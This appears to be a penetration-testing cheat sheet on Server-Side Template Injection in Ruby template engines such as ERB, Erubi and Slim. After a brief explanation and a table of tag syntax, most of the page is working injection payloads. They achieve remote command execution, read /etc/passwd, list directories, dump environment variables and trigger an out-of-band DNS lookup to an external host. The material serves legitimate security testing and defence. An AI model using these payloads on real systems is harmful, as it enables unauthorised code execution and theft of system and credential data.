Server Side Template Injection - Ruby

Server-Side Template Injection (SSTI) is a vulnerability that arises when an attacker can inject malicious code into a server-side template, causing the server to execute arbitrary commands. In Ruby, SSTI can occur when using templating engines like ERB (Embedded Ruby), Haml, liquid, or Slim, especially when user input is incorporated into templates without proper sanitization or validation.

Summary

• Templating Libraries
• Universal Payloads
• Ruby
  • Ruby - Basic injections
  • Ruby - Retrieve /etc/passwd
  • Ruby - List files and directories
  • Ruby - Remote Command execution
• References

Templating Libraries

Template Name	Payload Format
Erb	<%= %>
Erubi	<%= %>
Erubis	<%= %>
HAML	#{ }
Liquid	{{ }}
Mustache	{{ }}
Slim	#{ }

Universal Payloads

Generic code injection payloads work for many Ruby-based template engines, such as Erb, Erubi, Erubis, HAML and Slim.

To use these payloads, wrap them in the appropriate tag.

%x('id') # Rendered RCE
File.read("Y:/A:/"+%x('id')) # Error-Based RCE
1/(system("id")&&1||0) # Boolean-Based RCE
system("id && sleep 5") # Time-Based RCE

Ruby

Ruby - Basic injections

ERB:

<%= 7 * 7 %>

Slim:

#{ 7 * 7 }

Ruby - Retrieve /etc/passwd

<%= File.open('/etc/passwd').read %>

Ruby - List files and directories

<%= Dir.entries('/') %>

Ruby - Remote Command execution

Execute code using SSTI for Erb,Erubi,Erubis engine.

<%=(`nslookup oastify.com`)%>
<%= system('cat /etc/passwd') %>
<%= `ls /` %>
<%= IO.popen('ls /').readlines()  %>
<% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%>
<% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%>

Execute code using SSTI for Slim engine.

#{ %x|env| }

References

• Ruby ERB Template Injection - Scott White & Geoff Walton - September 13, 2017
• Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026

Share this content